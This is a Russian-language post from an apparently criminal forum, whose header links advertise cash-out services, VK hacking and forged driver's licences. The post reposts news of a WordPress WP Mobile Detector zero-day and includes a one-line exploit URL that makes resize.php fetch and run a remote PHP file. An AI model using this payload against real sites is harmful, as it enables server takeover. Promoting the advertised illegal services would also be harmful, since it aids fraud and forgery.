Обнал сервис docrus PolisBlank MoneyTeam TheMoneyTeam diplomist
Взлом ВК
hacknet Продажа, изготовление водительских удостоверений (нового и старого образца)

СМИ Хакеры эксплуатируют уязвимость нулевого дня в плагине к WordPress

Тема в разделе "Новости СМИ", создана пользователем Marck, 5/6/16.

  1. TopicStarter Overlay
    Marck

    Marck Ветеран Модератор Проверенный продавец

    Написать в ЛС
    Последняя активность:
    25.02.17
    Регистрация:
    23/8/15
    Сообщения:
    773
    Симпатии:
    333
    Сделок через ГС (Offelia):
    3
    Депозит:
    Уязвимость в WP Mobile Detector позволяет удаленно загрузить и выполнить произвольный PHP файл.

    Уязвимость нулевого дня в популярном плагине для мобильных загрузок WP Mobile Detector позволяет злоумышленнику загрузить и выполнить произвольный PHP файл на целевой системе. Согласно статистике на сайте WordPress, плагин насчитывает более 10 000 активных установок.

    Первые атаки на сайты были зафиксированы 29 мая этого года. Уязвимость заключается в отсутствии каких-либо проверок во время загрузки файла. Удаленный пользователь может отправить HTTP POST или HTTP GET запрос к уязвимому сайту, указав ссылку на вредоносный файл и загрузить его на сервер.

    Эксплоит к уязвимости выглядит следующим образом:

    http://[path to WordPress]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of upload file]
     
    Gannicus нравится это.
  2. Инфо. Бот Администратор

    Просьба ознакомиться с основными правилами проекта Читать.
    В сети полно мошенников, которые умело могут Вас развести и завладеть вашими денежными средствами.
    Для безопасности сделок рекомендуем пользоваться услугами Гарант сервиса.
     
дизайн реклама на форуме